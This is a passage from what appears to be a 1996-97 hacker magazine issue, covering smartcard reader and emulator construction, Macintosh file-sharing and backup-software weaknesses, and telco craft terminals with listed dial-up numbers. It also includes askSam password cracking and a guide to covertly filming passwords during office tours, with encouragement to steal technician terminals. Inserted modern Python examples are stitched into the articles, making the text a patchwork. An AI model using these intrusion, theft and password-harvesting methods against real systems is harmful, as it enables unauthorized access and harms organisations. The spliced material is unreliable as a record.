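def classify(measured_rise_ns: float, reader_pf: float = READER_PF) -> str:
    """'accept' when the implied card capacitance is within the genuine range, else 'reject'.
    Extra wiring, traces or an emulator hanging on the I/O line all add capacitance."""
    card_pf = implied_card_pf(measured_rise_ns, reader_pf)
    return "accept" if card_pf <= GOOD_CARD_MAX_PF + TOLERANCE_PF else "reject"


def screen(readings: dict) -> dict:
    """Run the check over a batch of {label: measured 0 -> 1 time in ns}."""
    return {label: classify(t) for label, t in readings.items()}


# Constructed readings: a genuine card at about 8pF, a card just over the 10pF figure, and
# a card with roughly 60pF of extra wiring attached to its I/O contact.
SAMPLE_READINGS = {
    "genuine_8pF": expected_rise_ns(8.0),
    "marginal_12pF": expected_rise_ns(12.0),
    "wired_60pF": expected_rise_ns(60.0),
}

if __name__ == "__main__":
    for label, verdict in screen(SAMPLE_READINGS).items():
        print(f"{label}: {SAMPLE_READINGS[label]:.0f} ns -> {verdict}")
```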

In other countries, the whole card may be “swallowed” and held. This will eliminate the need to use sophisticated wire detection methods. The card is entered in the long direction and a trap door closes that is supposed to cut off

[Schematic jumper notes: ‘French type’ memory card, jump JP1, JP3, JP4; 5V only memory card, jump JP1, JP3; jump JP5 for RST active low or high.]

to take apart the module, remove any protective coating, determine the type of chip, and probe it under a microscope. This is a lot of work in a non-smoking environment!) In a realistic system, public keys would be exchanged and then a switch to “conventional crypt” would be used as RSA is very computationally intensive. If you look at it as PGP on a chip, you got the idea! The cost of this type of card puts this system, for most uses, in the future. On all processor cards, it is the job of the processor to keep secret information on the card. There have been many reports of being able to “glitch” a card and read out its ROM with keys! Exact details are sketchy and beyond the scope of this article.

lengths with standard numbers of conductors. A chipcard may need a minimum of five and a maximum of eight conductors. Another approach has been to use microelectronics and build a self-contained emulator. While it may work fine in Germany or Greece it will be rejected by the metal detector in Holland.


Processor Cards 

While the scope of this article was to be on synchronous cards, the ability to “talk to” (read and write) asynchronous processor cards should be considered important. The circuitry is very simple and works with the serial port at 9600 bps. A very cheap 3.58 MHz quartz xtal supplies the clock. Per standard, all “smartcards” answerback at 9600 when the clock speed is 3.58 MHz. When used with the right software, one can do many things with the card, depending on how it is programmed. An inverse reader that also runs on the serial port will be described. The clock is ignored as your computer has one and simply talks to the card politely, one way at a time. To avoid any conflict of interest, all designs are my own and may be used for any non-commercial and non-criminal purpose.


Dumbmouse Universal Reader/Writer 
(Notes on Schematic) 

When configured for a processor card, the 3.58 MHz xtal osc is allowed to run, supplying the required rate for the card to typically produce 9600 bps serial data. While extremely simple, it is expected anyone using such a circuit will have proper prior knowledge of electronics and possibly software. The jumper options allow for variations on software and also provide the possibility of the CTS, DTR, and in some cases the TxD pins to provide the circuit power. External power (either a hard +5V or small current applied to the Zener diode at the “ext power” input) will allow for cards that draw extreme amounts of current or added convenience in programming and/or reduction of jumper pins.

To be able to read out and write to memory cards, the 3.58 MHz will not be used and shut off (jump JP1), disconnected (open JP2), and DTR will provide for CLK pulses (jump JP3). RTS will be used to reset the card. If the card is to be powered from the serial port, the position of JP5 should be that RST is inactive when RTS is providing power. During this reset time, the clever programmer will set TxD to provide continued power. In the French type phonecards, TxD will provide the actual reset and JP4 will be jumped as TxD will be providing power and preventing an RxD signal otherwise. (A quick note to someone programming: a “0” sent to the serial port produces a positive voltage or “mark” condition. So when a line is said to be “providing power”, a “0” is being put to that line. Conversely, what comes from the card I/O is inverted before going to the serial port. To power a card at least one and preferably two lines should be “providing power”. If this is not possible for a certain card, or if the card draws heavy current, additional power must be supplied.)

[Schematic, ‘INVERSE READER’: card Vcc (pin 1), RST (pin 2), GND (pin 5), I/O (pin 7); RS232 RxD (pin 2), TxD (pin 3), CTS (pin 8); Q1 BC547B, Q2 and Q3 BC557B, two 33k resistors, R3 6k8, R4 and R5 10k, D1 1N4148.]

Page 18 2600 Magazine Winter 1996-97

JP5 is to be set so RTS is active for “most of 
the time”. This will be fully dependent on the 
type of card used. For “active low” resets, as in 
most processor cards, RST (pin 2) will be con- 
nected to U1 pin 8, allowing RTS to be active 
while the card is active. For active high resets, a 
further inversion available at U1 pin 10 will 
provide a “0” when RTS is active. 

To be able to write software, the program- 
mer should have some knowledge of electron- 
ics or be within reach of someone who does. 
Except for writing French cards, simple code 
has been written to prove the concept. For 
French cards making RTS inactive will place 
+21V on Vpp (pin 6) and +5V on the nR/W pin 
(pin 2), burning the tic and making the I/O go 
to a “0”. In no case is the I/O port used to input 
data on a French card. Areas in the dashed lines 
apply only to French type memory cards and 
may be omitted if these are not of interest. 

This circuit is but one example that will 
cover all aspects of ISO/IEC 7816. Emphasis 
was given to a solution requiring no special 
components or programming fixtures. Low cost 
was also a major consideration. The card socket 
may be regarded by some as a “special compo- 
nent”. They are made by ITT Cannon, Omron, 
and Alcatel among others. This is a new hobby area, so your favorite over-the-counter parts house will almost certainly not carry them. The better distributors like Rodelco 
carry a full range of them. Cheaper ones (from 
consumer products) will ruin cards in no time 
and the features of the expensive types are 
probably not warranted for this application. 


Inverse Reader Notes 
The supplied schematic is for the emulation of processor type cards or to program devices that take processor cards. A special PCB could be made to bring out the four needed lines. Note the CLK is ignored and it is assumed the bit rate of the system is known. Use of a spent phonecard is a quick and cheap alternative to using a print. If using a print (PCB), it is well advised that the contacts are gold plated. In “consumer” cases, such as satellite decoders, it will be 9600 bps. The circuitry is capable of operating at any speed provided by a PC.

No schematic will be provided for synchro- 
nous card inverse readers. The clock must be 
brought out and all other details are supplied in 
the text. It is not the intent of this article to be 
about “free” calls. 


How to Use a Spent Phonecard 

The chip is a very small, approximately 1 
mm square piece of silicon located directly in 
the center of the module. To remove this, turn 
the card over and locate this point. Usually 
there will be an indication visible as an 8 mm 
circle on the back. The chip is in the exact cen- 
ter of this epoxy which is below the plastic. 
Carefully cut the bottom plastic of the card to 
reveal the black epoxy. The epoxy is rather soft 
so it can be cut down to the chip which is very 
hard. Break out the chip in pieces until you 
reach the metal of the ground contact. At this 
point you could carefully solder to the top of 
the card and place the wires in cut grooves so 
they are flush to the surface. Using low heat of 
about 175 degrees Celsius, you can fix the 
wires in the grooves or simply glue them down 
with epoxy. The card must maintain its constant 
thickness of about 0.85 mm. If you are more 
ambitious, continue to carefully remove the 
epoxy to reveal eight contact points where the 
chip’s bonding wires went and carefully solder 
from the bottom. As before, run the wires in 
grooves cut to the middle, bottom, or the far 
end of the card depending on the application. 
You may waste a card or two while you develop 
the technique, so have a few extra! 


(continued on page 46) 
BIGGEST MAC MISTAKES 


by The Guy Who Was In 
Craig Neidorf’s Spanish Class 
And Had No Idea 


As an IS/IT contractor, I know that folks 
take the simplicity of the Macintosh inter- 
face for granted and underestimate the cu- 
riosity of the Mac users. A nosey user can 
come along and mess things up nicely. 

This article discusses basic ways a Mac- 
intosh network can be attacked or compro- 
mised. The three open doors that I see on 
networks are File Sharing, Retrospect Re- 
mote, and Appletalk Remote Access. 


File Sharing 

To access a shared device, Mac users on 
a network access an AppleShare Server or a 
desktop computer with File Sharing acti- 
vated by selecting the Chooser under the 
Apple Menu, then selecting the AppleShare 
icon, then choosing a zone, and then dou- 
ble-clicking on a shared device. 

A screen with fields requiring a user 
name and password for registered users 
comes up. If the user enters a valid name 
and password, then access is gained to 
whatever directories or drives are available 
to that registered user. If guest access is en- 
abled, then users can select the radio button 
next to “Guest” without entering a user 
name and password, and click OK, giving 
them access to whatever has been assigned 
to Guest users. 

To share a computer (not using the AppleShare Server, but the AppleShare that comes with every Macintosh system), the following is done. On the computer to be shared, users go to Sharing Setup in the Control Panels folder and enter Owner Name, Macintosh Name, and Password in appropriate fields. Next they click the Start button next to the words File Sharing. If there is no password or user name, the computer will notify the user that this is a bad idea. Users then select the drive icon or folders to be shared with the mouse, then choose Sharing from the File menu and click on the check box with Share This Item And Its Contents. The entire hard drive or folder can be made available to users in varying degrees by using check boxes for See Folders, See Files, and Make Changes next to the words Owner, User/Group, and Everyone.

If a user wants to set up access to a com- 
puter for multiple users, then the user goes 
to the Users & Groups control panel. There 
will be a blockhead icon there for the 
Owner and one for Guest. By going to New 
User under the File menu, other blockheads 
can be created for different users with dif- 
ferent passwords. 


Where The Mistakes are Made 
with File Sharing 

I work at an advertising agency with 
thirty zones that connect offices in more 
than a dozen cities across the country. 
There are nearly 100 Macintosh computers 
wide open on the WAN because of one rea- 
son: filesharing is poorly configured. I have 
worked at companies with world-wide 
WANs (more than 30 offices and 4,000 
users - if you read the MacWeek 200, you 
might know who I’m talking about), and 
they are no better than the lone zone rinky- 
dink production shops. In fact, the larger 
the WAN, the harder it is to monitor file- 
sharing and the more likely there are gaping 
access holes. 

1. Guest access is turned on. When turning on filesharing, the user opens the Guest blockhead in the Users & Groups control panel and selects the check box for Allow Guests To Connect thinking that without this, no users can connect to the computer. In truth, this allows anybody to log on as guest to any shared item where Everyone is assigned the privileges See Folders, See Files, and Make Changes.

2. User shares the entire drive instead of 
certain folders. User selects the hard drive 
icon with the mouse, then chooses Sharing 
from the File menu and clicks on the check 
box with Share This Item And Its Contents. 
A user may compound the problem by se- 
lecting the check box for Make All Cur- 
rently Enclosed Folders Like This One 
which, after a warning, will change already 
specified privileges for folders inside the 
drive. Unless separate privileges are as- 
signed for the folders contained within the 
hard drive, all of the folders within will be 
available to users. The user needs to make 
sure they select the correct Owner or 
User/Group for each folder to allow only 
certain users to access certain folders. In 
order to share a folder within a hard drive, 
but not the hard drive itself, the hard drive 
icon need not be shared at all. Just share the 
folders within the drive. 

3. User leaves password blank and uses 
the same words for Owner Name and Mac- 
intosh Name. The Owner Name and Macin- 
tosh Name should not be the same in the 
Sharing Setup control panel. If they are, an 
unauthorized visitor can type the device 
name (which shows up in the Chooser) as 
the user name and leave the password blank 
to check each computer on the WAN one by 
one to see if the password is blank. If it is, 
the unauthorized visitor has complete ac- 
cess to the shared items. A variation on this 
is when the machine name is Joe Blow’s 
IIsi. The logical user name is, of course, Joe 
Blow. Even better, the password name is of- 
ten “Joe Blow”, or “joe blow” (Mac pass- 
words are case sensitive, but user names are 
not), or “joe”, or “blow”, or one of several 
other variations on the theme. 


Retrospect Remote

Retrospect Remote is the de facto standard in network backup software for the Macintosh. A control panel is installed (called Remote) on each machine that allows the server to access the drive. At Shutdown, the Retrospect control panel throws up another screen that says “Now waiting for backup...” and has Shutdown and Restart buttons. A screen saver will kick in a few seconds after this window comes up. The control panel allows files to be read from and copied to the startup drive or any attached readable and/or writable devices.

The control panel is configured from the 
Retrospect backup server by selecting Con- 
figure, then Remotes, and then Network. In 
the Network window you can select differ- 
ent zones and see available Retrospect Re- 
mote indicators next to machine names. 
These indicators come in three types: Not 
Activated, Not Logged In, and Responding. 
If you double click on a Not Activated de- 
vice, the server will check with the device 
and try to allow you to configure the control 
panel, which includes entering an activator 
code, password, and selecting drives at- 
tached to the device for backup. If you dou- 
ble click on a Not Logged In device, the 
server will attempt to connect you to the 
device. It may ask for a security code. If it 
does not, you will be allowed to change 
configurations and the server from then on 
will recognize the device as responding. If 
you double click on Responding, you may 
be asked for a security code, or if none is 
required, you will be allowed to change the 
configuration. 


Where The Mistakes are Made 
with Retrospect Remote 

1. Not putting a password in the configuration. In the 30 zones available here, you can access the entire hard drives of some 20 computers because their Remote control panels have not been assigned passwords. That includes more than five servers. As long as you have a Retrospect Remote server you can configure the Remote control panel and any Remote control panel that allows you access means that you can back up any attached storage devices to DAT (or whatever media you use). Backups can be restored to any computer, not just the one the data was backed up from.

2. Not activating Remote control panels. 
An unauthorized person could find unacti- 
vated control panels, enter an activator 
code, backup the hard drive to DAT, and 
then in the Network remote configuration, 
deactivate the control panel when finished. 
This would more or less restore the control 
panel to its virgin state. There is access to 
about five computers in this state. 

3. Makes owner and hard drive names 
available on network. By using the Retro- 
spect Remote server, a user can look at all 
of the owner names of any computer with 
the Remote control panel, even without 
knowing the security code. Because these 
owner names may not be the same as the 
machine names listed in the Chooser, they 
can be used to try the file sharing entrances 
explained above: owner name with blank 
password, owner name with machine name 
as password, vice versa, etc. Listings in the 
server’s Network remote configuration that 
you do have access to will also allow you 
to see the name of the startup drive and 
any other attached drives. These names are 
also fodder for user name and password 
guessing. 
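The File Sharing mistakes (1 to 3) and the Retrospect Remote mistakes (1 and 2) above, turned into an audit over an inventory of machines, as an added example that is not part of the article or of any of the products it names. The inventory layout, the finding codes and the sample records are constructed; on a real network the values would have to be gathered from each machine's Sharing Setup, Users & Groups and Remote control panels.

```python
# Added audit example, not part of the article: checks an inventory of Macs against the
# file sharing mistakes (1-3) and Retrospect Remote mistakes (1-2) the article lists.
# The inventory fields, finding codes and sample records are constructed.


def name_variants(name: str) -> set:
    """Passwords guessable from a name: the name, its lowercase form, and each word of it.
    (Mac passwords are case sensitive, so both cases are tried; user names are not.)"""
    words = name.split()
    variants = {name, name.lower(), *words, *(w.lower() for w in words)}
    variants.discard("")
    return variants


def audit_file_sharing(mac: dict) -> list:
    """Return (code, message) findings for the three file sharing mistakes."""
    findings = []
    if not mac.get("file_sharing_on"):
        return findings
    for item in mac["shared_items"]:
        everyone = item["everyone"]
        if mac["guest_allowed"] and any(everyone.values()):
            findings.append(("FS1", f"guests can reach '{item['path']}' via Everyone privileges"))
        if item["is_whole_drive"]:
            findings.append(("FS2", f"entire drive '{item['path']}' is shared"))
    owner, machine, password = mac["owner_name"], mac["machine_name"], mac["password"]
    if password == "":
        findings.append(("FS3", "owner password is blank"))
    if owner.lower() == machine.lower():
        findings.append(("FS3", "Owner Name and Macintosh Name are the same"))
    if password in name_variants(owner) | name_variants(machine):
        findings.append(("FS3", "owner password is guessable from the owner or machine name"))
    return findings


def audit_retrospect(mac: dict) -> list:
    """Return findings for the Retrospect Remote control panel, if installed."""
    remote = mac.get("retrospect_remote")
    if remote is None:
        return []
    if not remote["activated"]:
        return [("RR2", "Remote control panel not activated: any server can claim it")]
    if remote["security_code"] == "":
        return [("RR1", "Remote control panel has no security code")]
    return []


def audit(inventory: list) -> dict:
    """Map machine name -> list of findings across both checks."""
    return {m["machine_name"]: audit_file_sharing(m) + audit_retrospect(m) for m in inventory}


# Constructed inventory: one machine showing the article's mistakes, one server that still
# has a blank password and an unactivated Remote, and one configured correctly.
SAMPLE_INVENTORY = [
    {"machine_name": "Joe Blow's IIsi", "owner_name": "Joe Blow", "password": "joe",
     "file_sharing_on": True, "guest_allowed": True,
     "shared_items": [{"path": "Macintosh HD", "is_whole_drive": True,
                       "everyone": {"see_folders": True, "see_files": True, "make_changes": True}}],
     "retrospect_remote": {"activated": True, "security_code": ""}},
    {"machine_name": "Art Server", "owner_name": "Art Dept", "password": "",
     "file_sharing_on": True, "guest_allowed": False,
     "shared_items": [{"path": "Macintosh HD/Jobs", "is_whole_drive": False,
                       "everyone": {"see_folders": False, "see_files": False, "make_changes": False}}],
     "retrospect_remote": {"activated": False, "security_code": ""}},
    {"machine_name": "Prepress 2", "owner_name": "Sue Chen", "password": "m0ng00se!",
     "file_sharing_on": True, "guest_allowed": False,
     "shared_items": [{"path": "Macintosh HD/Drop Box", "is_whole_drive": False,
                       "everyone": {"see_folders": False, "see_files": False, "make_changes": True}}],
     "retrospect_remote": {"activated": True, "security_code": "7731"}},
]

if __name__ == "__main__":
    for machine, findings in audit(SAMPLE_INVENTORY).items():
        print(machine, "->", [code for code, _ in findings] or "clean")
```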


Appletalk Remote Access (ARA) 

Appletalk Remote Access allows a 
Macintosh to dial into an Appletalk net- 
work. It gives the user access to servers, 
email, printers, and any other network func- 
tions the same as if the user was in the of- 
fice connected via Ethernet. 


Where The Mistake is Made with ARA 

A company has to go out of their way to allow ARA to access the network. At least one version of ARA allows users to save their passwords in the configuration file. You might be surprised at how many users prefer to save their password and take the chance rather than have to enter the password every time they log onto the network. That means that if you can get an ARA configuration document with the saved password, then you can access the network at will; the document already contains the user name and phone number, so all the secrets are out and nothing more is required. PowerBooks, as an example, are especially susceptible to the saved config file and the other methods described in this article for the simple reason that they are probably the most stolen computer in America by percentage.


Programs That Give You An Edge 
Over Nosey Parkers 

I have found these two programs to be 
useful in monitoring security on my network. 

Network Security Guard 3.1, http://www.mrmac.com/ for demo version. Lacks 
elegance and looks, but is effective. Does 
bulk password throwing at any shared drive 
on the network. Checks for the file sharing 
weaknesses mentioned above, uses dictio- 
naries, lists files available, lists suspicious 
configurations available on a network. 
Saves everything in reports. Serious pro- 
gram for protecting yourself from attacks, 
but can also be used against you. When used 
it hogs all available processing power, so a 
dedicated Mac is good. You will want to run 
it during the day when computers are turned 
on and the network is at its most active. 

Lookout! by Pace Bonner & Jeff Amfahr, PB Computing, distributed by Trik, Inc. at 800-466-TRIK, http://www.pbcomputing.com/. Part of the Nok Nok Package of AppleShare 
This control panel indicates in the Chooser 
next to the machine names whether guest 
access is enabled and what kind of fileshar- 
ing is enabled. Makes checking each listing 
for guest access much faster, particularly on 
a large network. 
CRAFT ACCESS TERMINAL 


by Local Loop 

Aside from the butt sets, phone techs 
(linemen, splicers, etc.) also carry some- 
thing known as CATs. Yellow handset 
lookalikes. They have been out for a while 
now and almost all of you have probably 
seen them. The regular TS-21 type handsets 
have almost faded as the CATs can do 
everything a TS type handset does and 
more! In this article I will briefly introduce 
the system, list the menus available, and 
describe the sequence of events occurring 
when testing, etc. Here it goes. 


CAS Test Site 

Let’s start with CAS (Craft Access System). CAS is a network of computers that provides the technician in the field direct access to the operating systems through hand-held computer terminals known as CATs. A tech can use CAT to perform various functions like dispatch, closeout, and testing, etc. Before CATs were introduced, dispatches and testing were done by calling into the dispatch office or the CO for various testing. This network of computers includes computer systems like LMOS HCFE (High Capacity Front End) and SARTS (lovingly called FARTS).

The CAS includes the AC (Administra- 
tive Computers) and the APs (Application 
Processors) which are directly linked by 
phone to CATs. Refer to the diagram below 
for the total picture: 

The AC provides security, keeps a history of current jobs, handles disk storage functions and downloads information to the APs. The APs are usually located in the COs, manage craft access dial-in lines (in other words, this is where the tech dials in using his CAT), software etc. Each AP can hold about 15 APM (Modules) and each of these APMs can have five dial-in lines accessed by a hunt group number sequence.

The connections between DATAKIT 
and the other host machines like APs and 
AC are synchronous. This network also 
supports LMOS/MLT (Mechanized Loop 
Test) for testing POTS (plain old telephone 
service). 

The CAT, yellow in color, has a joystick below the terminal screen. See below:

[Diagram of the CAT joystick with its BACK and REVIEW positions.]

In the above diagram (self explanatory), move as you wish.


Menus on the CAT 

There are 14 main job screens or menus 
that can be accessed on the CAT. Here they 
are as follows: 

LOOK AT LINE RECORD 

From the Main Menu select: 

1. work on current job 

2. other test menu 

3. look at line record 

REARRANGE BULK LOAD 

From the Main Menu select: 

1. other 

2. reorder bulk jobs 

3. update sequence 

RETURN INCOMPLETE 

From the Main Menu select: 

1. close or return 

2. return incomplete 

3. other 

TROUBLE CLEARED IN CO 

From the Main Menu select: 

1. close or return 


TEST OK

From the Main Menu select:

1. close or return

2. test ok

(Loyal telephone customers must agree that service is now OK.)

TROUBLE ISOLATED IN CO

From the Main Menu select:

1. close or return

2. return menu options

3. return to CO

(This is when the tech says, “I am sorry sir, further work will be required on your line.”)

PAIR CHANGE

From the Main Menu select:

1. close or return

2. return to menu options

3. return incomplete

4. pair change-CO work to be done

This is when Cable Pair Change is necessary to rectify the problem.

RETURN TO CABLE

From the Main Menu select:

1. close or return

2. return menu options

3. return to cable

LOCATE TWO SIDED FAULT

From the Main Menu select:

1. work on the current job

2. locate fault

3. verify fault

4. verify good pair

5. locate 2 sided fault

TONE ON LINE

From the Main Menu select:

1. work on current job

2. get tone or MDF

DROP TONE WHEN DONE

1. work on current job

2. other test menu

3. drop tone, locate, coin, or MDF

CHECK COMMITMENT DATE

From the Main Menu select:

1. close or return

2. return menu options

3. return to CO

2. no access

LOCATE ONE SIDED FAULT

From the Main Menu select:

1. work on current job 

2. locate fault 

3. verify fault 

4. locate one-sided test 

LINKED JOB 

Go to review mode (move down and 
press joystick down), select dispatch. Techs 
use this to link other jobs together. They 
may select it or refuse. 

USING CO SHOE TAG 

From the Main Menu select: 

1. work on current job 

2. get tone or MDF 

3. get MDF access 

4. let MLT pick shoe 


CAT - Sequence of Events when testing 

1) Techs hook up the T and Ring on any 
block and use CAT to “receive new job” 
from the dispatch office. Techs dial into the 
CAS using a 4 digit passcode. The pass- 
codes are sometimes written on the CAT 
(e.g., 4432 etc.) 

The CAT’s serial number and the 4 digit 
code are linked, so when the tech calls into 
the CAS APs, the serial number along with 
his XXXX code are matched. 

So the next time you decide to steal a 
CAT, make sure it’s on a Friday. This way, 
you can have fun with it on Saturday and 
Sunday. On Monday, when the tech informs 
the dispatch office, the passcode will die. 
However, the CAT will still keep giving you 
“bogus” menus. The CAT now is basically 
useless. The telephone company may trace 
you to the number the CAT is being used 
on. Since the CAT is officially useless, 
don’t bother using it. 

2) The circuit information for the cir- 
cuit problem will already be prepared for 
the troubled circuit. The field tech, lineman, 
or whoever will then initiate the access re- 
quest. 

3) SARTS interface relays the circuit access and initiates the far-end to access in the same way as an access coming from a 52A TP (Test Position, which is a stationary terminal that has access to SARTS). One major difference is that TSV (Test Status Verification), commonly known as monitoring lines, is not permitted on the CAT. 

4) Once the circuit has been accessed 
and found idle, the tech may perform vari- 
ous tests. 

5) The Far-end (like RTS - Remote 
Testing System - which is used with 
SMAS) performs the requested tests and 
sends the results back to the SARTS. 

6) The SARTS sends results to 
DATAKIT and to AP. 

7) AP sends the results to CAT display. 


Some CAS Dial-ups 
(718) 523-1177 
(718) 657-4650 
(718) 658-1666 








It’s happening this year 
New York City 
August 8, 9, 10 

(Note date change) 
Full registration info in the Spring issue 








Winter 1996-97 2600 Magazine Page 25 













CRACKING ASKSAM 





by Datum Fluvius 


I have used askSam since my friend lent 
me a copy several years ago, and since then I 
have come to appreciate the advantages it of- 
fers. For those out there unfamiliar with 
askSam, I will elaborate: it is a database pro- 
gram which thinks like a word processor with 
a powerful macro language. It is unique in 
my experience of databases. Unlike any other 
database I have ever used, askSam needs no 
fields or labels. It will accept them, of course, 
but it does not insist on them at all. This 
means you can import your word processing 
documents into askSam and search them in 
ways your word processor’s “find” command 
doesn’t support, like asking for each instance 
of “Dale Drew” within ten words of the term 
“snitch”, while ignoring documents which 
contain “Nancy”. In addition to its unique 
search functions, askSam also supports Hy- 
pertext links. I was introduced to this concept 
by askSam a good five years before Netscape 
made it a household word. 

Since I am poor, though, the deciding 
factor for me was that I bought my own copy 
of askSam 4.2 for DOS for under $40. 

Anyone who wishes to have the latest can 
get askSam for Windows 3.0 for just $150. If 
you have ever priced databases, you know 
that is dirt cheap! This combination of inex- 
pensive, powerful search possibilities has 
made askSam a librarian’s dream. Many li- 
braries use it, as well as genealogists and so- 
cial scientists. 

My favorite use is to import an electronic 
phone directory into it, so I can search for 
patterns in the prefix assignments for my 
city, or search for phone numbers by address 
rather than name. If I wanted to, I could pull 
the address of every woman named Martha 
on Oak Street. But that hardly ever comes in 
handy anymore since I met my wife. 
I used askSam for so many projects over 
the years that keeping track of my passwords 
on the various files became impossible. 
Eventually I found myself locked out of 
seven or eight of my old files and had to 
crack my way back inside. Oops! 

The next time you feel secure in your se- 
curity measures, lose your password and 
crack your favorite program. You will either 
fail and feel uncertain of your own skill, or 
you will succeed and feel absolutely silly for 
extending your trust to any password. 

AskSam, to put it bluntly, is not secure. 

It uses a simple substitution cipher which 
can easily be made into a table and passed 
around, or hacked individually with an hour’s 
worth of simpleminded effort. I have found 
this to be true on both askSam for DOS 4.0 
and the askSam for Windows 3.0 demo. 


The Procedure 

First, obtain a working copy of askSam, 
of any flavor you wish. (You might want to 
download the demo copy direct from the 
company for free: http://www.asksam.com.) 
I will not guarantee that this will work on all 
versions, but the law of conservation of code 
probably holds true here, so it is worth a try. 

Next, create a series of askSam files, and 
create “update” passwords for each of them 
in the format “AAAAAAAA,” “BBBBBBBB,” ... “ZZZZZZZZ”. (You only need to 
crack the “update” password, since it is the 
high level access you need to change the low 
level “retrieve” password, and to access 
askSam’s encryption if that is invoked.) 
Keep plugging at this until you have ex- 
hausted the capital letters and lower case let- 
ters, and perhaps the digits and special 
characters as well. 

Next, use your favorite hex editor to peek 
at the file headers of each file, dumping the 
eight hex bytes beginning at the 30th byte 
into any convenient location you choose, such as a printer. In the DOS version, these bytes are preceded by a 50h (“P”) and are easy to spot by eye. In the Windows version they are in exactly the same location, without any giveaway “P”. Instead, it’s an A0h. 
Note the password letter of the file next to 
the string, so you know where it fits in the 
Big Picture. 

Once you have a list of what askSam 
does with each letter and number possible, 
you can set up a table to decode the pass- 
words by hand on a single spreadsheet. You 
will not be required to actually do this, since 
askSam’s programmers got lazy and left the 
same substitution table on every copy of 
askSam I’ve ever seen. Just use my handy- 
dandy password decrypting table, but re- 
member that the password is stored back- 
wards. The procedure merely gives you an 
idea of how to get around a custom substitu- 
tion cipher if one is present. Perhaps you 
could make one yourself. 

Why does this work? The reason is that askSam simply substitutes one hex value for another, in a one-to-one relationship. It only 
looks encrypted to a human, in part because 
the replacement alphabets are slightly 
scrambled (the substitutions don’t follow al- 
phabet order strictly) and each bit position 
uses a different setting of the “wheel”. There 
are no random offsets, RSA keys, or any- 
thing at all fancy to it. It is, in fact, a com- 
puterized version of the outdated code 
wheel, made famous in hundreds of gram- 
mar-school cipher textbooks. It is also as in- 
secure as any cipher could possibly be, since 
every copy of the program seems to use the 
same cipher wheels, set in the same way. 

These kinds of ciphers (Enigma) were 
broken by some of the earliest digital com- 
puters in the Second World War, but they at 
least depended on new code wheels every 
few days or weeks. Poor askSam need be 
broken only once, and it’s curtains for the en- 
tire lot. 
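The procedure above (chosen passwords, dumping the eight stored bytes, tabulating them) carried through in code, as an added example that is not part of the article: the cipher wheels, the header layout (marker byte 50h at offset 29, password at offset 30, NUL padding) and the sample password are all constructed for this demonstration and are not askSam's real table or file format.

```python
"""Recovering a fixed per-position substitution table by chosen plaintext.

Toy model of the scheme the article describes: each of the 8 password
bytes goes through its own fixed substitution ("code wheel") and the
result is stored reversed in the file header. The wheels here are
CONSTRUCTED from a fixed seed for this example only; they are not
askSam's real table, and the header offsets are an assumption.
"""
import random
import string

PW_LEN = 8
MARKER_OFFSET = 29       # assumption: where the 50h ("P") byte from the article sits
PW_OFFSET = 30           # assumption: "the 30th byte", read as a 0-based offset
PAD = "\x00"             # assumption: short passwords are NUL-padded
ALPHABET = string.ascii_letters + string.digits


def make_toy_wheels(seed: int = 1996) -> list:
    """One random byte permutation per password position (constructed toy)."""
    rng = random.Random(seed)
    wheels = []
    for _ in range(PW_LEN):
        perm = list(range(256))
        rng.shuffle(perm)
        wheels.append(bytes(perm))
    return wheels


def toy_store_password(password: str, wheels: list) -> bytes:
    """Toy encoder: pad to 8, reverse (as the article says), substitute per position."""
    raw = password.encode("ascii")[:PW_LEN].ljust(PW_LEN, PAD.encode())
    return bytes(wheels[i][b] for i, b in enumerate(raw[::-1]))


def toy_header(password: str, wheels: list) -> bytes:
    """A 64-byte constructed header carrying the marker and the stored password."""
    hdr = bytearray(64)
    hdr[MARKER_OFFSET] = 0x50
    hdr[PW_OFFSET:PW_OFFSET + PW_LEN] = toy_store_password(password, wheels)
    return bytes(hdr)


def extract_stored_password(header: bytes) -> bytes:
    """Pull the 8 stored bytes out of a header, checking the marker first."""
    if header[MARKER_OFFSET] != 0x50:
        raise ValueError("marker byte not found; header layout differs")
    return header[PW_OFFSET:PW_OFFSET + PW_LEN]


def recover_inverse_tables(store, alphabet: str = ALPHABET) -> list:
    """Build per-position inverse tables from one chosen password per symbol.

    `store` maps a password to its 8 stored bytes (the toy encoder here; in
    the article, the program itself writing a file). A password such as
    "AAAAAAAA" reveals the image of 'A' at every position in one query, so
    the whole table costs len(alphabet) + 1 queries (the +1 for padding).
    """
    inverse = [dict() for _ in range(PW_LEN)]
    for ch in alphabet + PAD:
        stored = store(ch * PW_LEN)
        for pos, out in enumerate(stored):
            if inverse[pos].get(out, ch) != ch:
                raise ValueError(f"position {pos}: not a one-to-one substitution")
            inverse[pos][out] = ch
    return inverse


def decode_stored_password(stored: bytes, inverse: list) -> str:
    """Invert each position, undo the reversal, drop padding; '?' marks unknown bytes."""
    chars = [inverse[pos].get(b, "?") for pos, b in enumerate(stored)]
    return "".join(chars)[::-1].rstrip(PAD)


def demo() -> str:
    wheels = make_toy_wheels()
    locked = toy_header("Secret42", wheels)               # header of a "forgotten" file
    encoder = lambda pw: toy_store_password(pw, wheels)   # stands in for the program
    inverse = recover_inverse_tables(encoder)
    return decode_stored_password(extract_stored_password(locked), inverse)


if __name__ == "__main__":
    print(demo())   # Secret42
```

Because the substitution is fixed per position and shared by every copy, the table recovered once from the 63 chosen passwords decodes every other file's stored password; a per-file salt or a real key derivation would have made each file a fresh problem.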

If you really like askSam, as I do, you’ll 
probably want to secure it with PGP or some 
sneaky steganographic method. At least 
those offer some defense. I think.... 





In! Post-It Note Salvation 

So they let you in for a tour. Idiots. 

First is first, aim your camera at every- 
thing. Most important is to ask about their 
“jump into the 21st century”. Companies love 
the fact that they have the money for kick-ass 
computers and have no compunctions about 
showing that to anyone who comes along. 
They’ll start blabbing about their network and 
their T1 connections and all that shit. They’ll 
log on for you. Aim the camera at the key- 
board at the best angle you can and record the 
typing. It doesn’t matter if you can see it right 
there or not. That’s the beauty of video... 
check it out in slow mo at home. 

Next, as you pass any post-it notes, check 
‘em out on video. Those little yellow bas- 
tards are like Jesus. Every office has idiots 
who write passwords on them. 
After that, just walk around. Get anything 
on tape you can. Videotape is cheap. Don’t 
be afraid to waste it. Check out security. 
Check out their UNIX server. Check out 
everything. Use your head and just look. 
That’s all I can say. 


Clean-Up 

Throw your tape in your VCR and go 
over everything. Look for any lapses in secu- 
rity. Any passwords. Slo-mo through typing 
and post-it notes. 

The hard part is getting in. After that, it’s 
plenty easy. 


Shoutouts to The Genocide2600 and Sili- 
con Toad. Special Thanks to dumb security 
personnel in corporation buildings every- 
where. 
by Schlork 


If your company is using MS-Mail (not 
